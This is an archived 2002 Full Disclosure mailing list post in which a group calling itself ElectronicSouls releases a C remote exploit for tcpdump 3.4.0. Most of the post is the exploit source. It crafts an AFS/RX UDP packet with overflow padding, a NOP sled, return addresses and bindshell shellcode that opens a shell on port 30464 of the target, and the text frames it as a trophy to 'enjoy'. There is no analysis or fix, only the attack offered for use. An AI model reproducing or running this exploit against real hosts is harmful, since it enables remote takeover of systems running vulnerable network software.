Full Disclosure mailing list archives

Previous By Date Next
Previous By Thread Next

[ElectronicSouls] - tcpdump exploit

From: es () hush com
Date: Fri, 29 Nov 2002 00:11:44 -0800

-----BEGIN PGP SIGNED MESSAGE-----

Dear List,

We are releasing this for political reasons.  We don't need to backdoor
tcpdump to get root on you, like those scriptkiddies do, we can find
our own bugs to exploit from mailing lists and then write our exploits.

Enjoy.

# cat  ES-tcpdump-xp-not-finished.c
   /*
    * MAD PRIVATE !%&#*
    * Linux x86 Tcpdump 3.4.0 (maybe others!) Remote Exploit (with -s 500 or higher)
    * (C) BrainStorm - ElectronicSouls - \x45\x53 0wnez ;)
    * DO NOT DISTRIBUTE !
    */

    #include <stdio.h>
    #include <netinet/in.h>
    #include <sys/types.h>
    #include <sys/socket.h>
    #include <netdb.h>
    #include <arpa/inet.h>

    #define ADDR                    0xbffff248
    #define OFFSET                  0
    #define NUM_ADDR                10
    #define NOP                     0x90
    #define NUM_NOP                 100

    #define RX_CLIENT_INITIATED     1
    #define RX_PACKET_TYPE_DATA     1
    #define FS_RX_DPORT             7000
    #define FS_RX_SPORT             7001
    #define AFS_CALL                134

    struct rx_header
    {
        u_int32_t epoch;
        u_int32_t cid;
        u_int32_t callNumber;
        u_int32_t seq;
        u_int32_t serial;
        u_char type;
        u_char flags;
        u_char userStatus;
        u_char securityIndex;
        u_short spare;
        u_short serviceId;
    };

    char shellcode[] = /* Taeho Oh bindshell code at port 30464 */
    "\x31\xc0\xb0\x02\xcd\x80\x85\xc0\x75\x43\xeb\x43\x5e\x31\xc0"
    "\x31\xdb\x89\xf1\xb0\x02\x89\x06\xb0\x01\x89\x46\x04\xb0\x06"
    "\x89\x46\x08\xb0\x66\xb3\x01\xcd\x80\x89\x06\xb0\x02\x66\x89"
    "\x46\x0c\xb0\x77\x66\x89\x46\x0e\x8d\x46\x0c\x89\x46\x04\x31"
    "\xc0\x89\x46\x10\xb0\x10\x89\x46\x08\xb0\x66\xb3\x02\xcd\x80"
    "\xeb\x04\xeb\x55\xeb\x5b\xb0\x01\x89\x46\x04\xb0\x66\xb3\x04"
    "\xcd\x80\x31\xc0\x89\x46\x04\x89\x46\x08\xb0\x66\xb3\x05\xcd"
    "\x80\x88\xc3\xb0\x3f\x31\xc9\xcd\x80\xb0\x3f\xb1\x01\xcd\x80"
    "\xb0\x3f\xb1\x02\xcd\x80\xb8\x2f\x62\x69\x6e\x89\x06\xb8\x2f"
    "\x73\x68\x2f\x89\x46\x04\x31\xc0\x88\x46\x07\x89\x76\x08\x89"
    "\x46\x0c\xb0\x0b\x89\xf3\x8d\x4e\x08\x8d\x56\x0c\xcd\x80\x31"
    "\xc0\xb0\x01\x31\xdb\xcd\x80\xe8\x5b\xff\xff\xff";

    long resolve(char *name)
    {
     struct hostent *hp;
     long ip;

     if ((ip=inet_addr(name))==-1) {
     if ((hp=gethostbyname(name))==NULL) {
     fprintf (stderr,"Can't resolve host name [%s].\n",name);
     exit(-1);
     }
     memcpy(&ip,(hp->h_addr),4);
     }
     return(ip);
    }

    int main (int argc, char *argv[]) {

     struct sockaddr_in addr,sin;
     int sock,aux, offset=OFFSET;
     char buffer[4048], *chptr;
     struct rx_header *rxh;
     long int *lptr, return_addr=ADDR;


     fprintf(stderr,"\n\n [ E l e c t r o n i c S o u l s ] \n");
     fprintf(stderr,"Tcpdump 3.4.0 Remote Exploit by BrainStorm\n\n");

     if (argc<2)
     {
     printf("Usage: %s <host> [offset]\n",argv[0]);
     exit(-1);
     }

     if (argc==3) offset=atoi(argv[2]);
     return_addr+=offset;
     fprintf(stderr,"[+] Using return addr: %#x\n",return_addr);

     addr.sin_family=AF_INET;
     addr.sin_addr.s_addr=resolve(argv[1]);
     addr.sin_port=htons(FS_RX_DPORT);

     if ((sock=socket(AF_INET, SOCK_DGRAM,0))<0)
     {
     perror("socket()");
     exit(-1);
     }
     sin.sin_family=AF_INET;
     sin.sin_addr.s_addr=INADDR_ANY;
     sin.sin_port=htons(FS_RX_SPORT);

     if (bind(sock,(struct sockaddr*)&sin,sizeof(sin))<0) {
     perror("bind()");
     exit(-1);
     }
     memset(buffer,0,sizeof(buffer));

     rxh=(struct rx_header *)buffer;
     rxh->type=RX_PACKET_TYPE_DATA;
     rxh->seq=htonl(1);
     rxh->flags=RX_CLIENT_INITIATED;

     lptr=(long int *)(buffer+sizeof(struct rx_header));

     *(lptr++)=htonl(AFS_CALL);
     *(lptr++)=htonl(1);
     *(lptr++)=htonl(2);
     *(lptr++)=htonl(3);
     *(lptr++)=htonl(420);

     chptr=(char *)lptr;
     sprintf(chptr,"1 0\n");
     chptr+=4;

     memset(chptr,'A',120);
     chptr+=120;

     lptr=(long int *)chptr;

     for (aux=0;aux<NUM_ADDR;aux++) *(lptr++)=return_addr;
     chptr=(char *)lptr;

     memset(chptr,NOP,NUM_NOP);
     chptr+=NUM_NOP;

     shellcode[30]=(char)(46);

     memcpy(chptr,shellcode,strlen(shellcode));
     chptr+=strlen(shellcode);

     sprintf(chptr," 1\n");

     if (sendto(sock,buffer,520,0,&addr,sizeof(addr))==-1)
     {
     perror("send()");
     exit(-1);
     }
     fprintf(stderr,"Overflow sent, now wait for your shell =) ..\n\n");
     close(sock);
     return(0);
    }

#

The Electronic Souls Crew
[ElectronicSouls] (c) 2002

"Winner of the Best Eyes Award"

-----BEGIN PGP SIGNATURE-----
Version: Hush 2.2 (Java)
Note: This signature can be verified at https://www.hushtools.com/verify

wlMEARECABMFAj3nIU8MHGVzQGh1c2guY29tAAoJEN5nGqhGcjltGnYAnRPF4oJBlaU0
2AGLKlLdTNrRinezAJ9EpWGLb2K8esivw+01R5LKf4mCxQ==
=Bh2L
-----END PGP SIGNATURE-----




Concerned about your privacy? Follow this link to get
FREE encrypted email: https://www.hushmail.com/?l=2 

Big $$$ to be made with the HushMail Affiliate Program: 
https://www.hushmail.com/about.php?subloc=affiliate&l=427
_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.netsys.com/full-disclosure-charter.html
Previous By Date Next
Previous By Thread Next

Current thread: